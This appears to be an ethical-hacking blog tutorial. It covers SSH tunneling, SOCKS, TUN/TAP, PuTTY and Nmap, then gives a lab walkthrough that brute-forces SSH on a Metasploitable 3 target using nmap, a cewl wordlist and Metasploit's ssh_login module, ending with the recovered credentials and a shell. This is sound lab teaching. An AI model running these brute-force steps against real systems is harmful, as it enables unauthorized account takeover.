ssh-secure
  1. Know what is port forwarding? ssh_protocol

So, we got to know that to establish a tunnel; port forwarding has to become real. How can one do this? Firstly, port forwarding, otherwise referred to as port mapping includes three critical techniques combined:

  • A new destination is defined for a packet instead of its original address or number of port.
  • Such packets become usually accepted by firewalls working as packet filters.
  • The routing tables are used for the sake of forwarding the packets

There are also three types of port forwarding:

  • Local port forwarding
  • Remote port forwarding
  • Dynamic port forwarding
  1. Understand what SOCKS and SOCKS5 are? ssh_protocol

Socket Secure is a standard internet protocol also referred to as SOCKS. Through such protocol, a proxy server could be the means where network packets have the ability to get exchanged between a client and a server.

Authentication is a plus for SOCKS5, meaning that such proxy server cannot be accessed without authenticating a user who is wishing to get access to the server. This implies the fact that there should be some bunch of authorized users that are allowed to get into the server.

In practical, TCP connections become proxied by SOCKS5 protocol to an arbitrary internet protocol (IP) address.  Similarly, forwarding of UDP connections can also happen through such protocol.

It is important to know that the service of such protocol works on TCP port number 1080 where an incoming client connection gets accepted. The layer specified for such protocol is the session layer which is the fifth layer of the Open Systems Interconnection model (OSI model). Such layer resides fundamentally between the presentation layer and the transport layer.

Layer 2 and Layer 3 tunnels are supported by modern versions of OpenSSH where connections can happen on such layers between two devices enabling such connections or tunneling capabilities.

Through such connections, TUN gets created by default on layer three whereas TAP gets created by default on layer 2. TUN and TAP are basically virtual network kernel devices, which are fundamentally different from ordinary network devices which are backed up by hardware network adapters.

Such virtual interfaces get created on both devices and then it is allowed to manage the network and adjust the routing. When using them on routers, this will lead to tunneling of a subnetwork traffic entirely not only an application or a port connection as in SOCKS and SSH tunneling respectively. An Ethernet cable between both devices could simply get simulated using two TAP virtual interfaces on both devices. Kernel bridges can occur accordingly using this method.

  1. Get familiar with PuTTY?                                                                                       

    ssh_protocol

Let’s get some background on the topic first of all. PuTTY on its own has no meaning, yet it is free and open-source software. In fact, it is a terminal emulator, serial console, and also a network file transfer application. Plenty of network protocols are supported through such application such as Secure Copy (SCP), Secure Shell (SSH), Telnet, rlogin, and raw socket connection. Moreover, a serial port could be connected by PuTTY.

  1. Understand Nmap ssh_protocol

Nmap also offers a great means of transferring and redirecting data in a flexible manner. While the debugging tool used with Nmap is called Ncat, the utility tool for getting the scan results compared is named Ndiff. Also, a response analysis tool is used to it and is called Nping.

Finally, one advantage of using Nmap is that besides having a command line interface, it provides a user with an interactive Graphical User Interface (GUI). In the meanwhile, the results viewer called Zenmap makes it very easy and simple to understand the results and further analyze them.

  1. Know how to use Brute Forcing SSH to exploit Metasploitable3? ssh protocol

The purpose of this tutorial is mainly to cover SSH login attack. Consider that the port number 22 is open on which SSH service has the capability to run and operate. The operating system used by the attacked machine is Metasploitable 3. We have intentionally opened the ports specifically for this tutorial purposes.

  • Open the Kali Linux terminal.
  • Scan for the open ports of the target IP address using the Nmap network security utility. The following command could be used for this purpose. This way we could be able to understand which ports are allowed to run services on them then. This will show that fortunately, port 22 is open.
    nmap –p- -sV 192.168.1.8
  • Create a dictionary file type using the following command:
    cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt
  • Just to explain more the last command which we used, let’s get to understand what the command “cewl” is utilized for. Basically, when a customized word list is needed to get made with the use of a given URL, then CeWL should be used.

The dictionary file which we created in the last command is generated from the Wikipedia of Metasploitable 3. This could be used in the following steps to get the password found and discovered.

  • Start the Metasploit framework now using the following terminal’s command:
    msfconsole
  • SSH logins should now get tested on plenty of machines in order to determine the successful logins within such logins. A database plug-in can be loaded where a connection to a database gets recorded. The following module is depended on when getting the successful logins recorded along with the hosts as well.
    use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login)>set rhosts 192.168.1.8
    msf auxiliary (ssh_login)>set port 22
    msf auxiliary (ssh_login)>set username vagrant
    msf auxiliary(ssh_login)>set pass_file /root/Desktop/dict.txt
    msf auxiliary(ssh_login)>set stop_on_success true
    msf auxiliary (ssh_login)> exploit
  • The credential as the username being “vagrant” while the associated password with it is “vagrant”. Furthermore, a shell of a victim is opened on a session on the attacker’s machine using SSH connection.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

[ihc-select-level]

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.